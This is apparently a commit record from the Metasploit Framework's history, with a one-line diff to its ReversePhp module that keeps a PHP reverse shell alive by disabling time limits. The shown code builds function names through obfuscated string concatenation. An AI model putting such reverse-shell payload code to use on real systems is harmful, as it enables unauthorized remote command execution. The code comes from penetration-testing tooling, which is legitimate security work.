fix timeout issues in reverse php shell

git-svn-id: file:///home/svn/framework3/trunk@5461 4d416f70-5f16-0410-b530-b9f4589650da
unstable
James Lee 2008-04-01 02:08:19 +00:00
parent 9c7f5d7130
commit 9019b077bd
1 changed files with 1 additions and 0 deletions

View File

@ -97,6 +97,7 @@ module ReversePhp
$disabled=array();
}
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set($m.$a.$x.$_.$e.$x.$e.$c.$u.$t.$i.$o.$n.$_.$t.$i.$m.$e,0);
function myexec($cmd){
global$disabled,$_,$a,$c,$e,$h,$m,$n,$o,$p,$r,$s,$t,$u,$x,$y;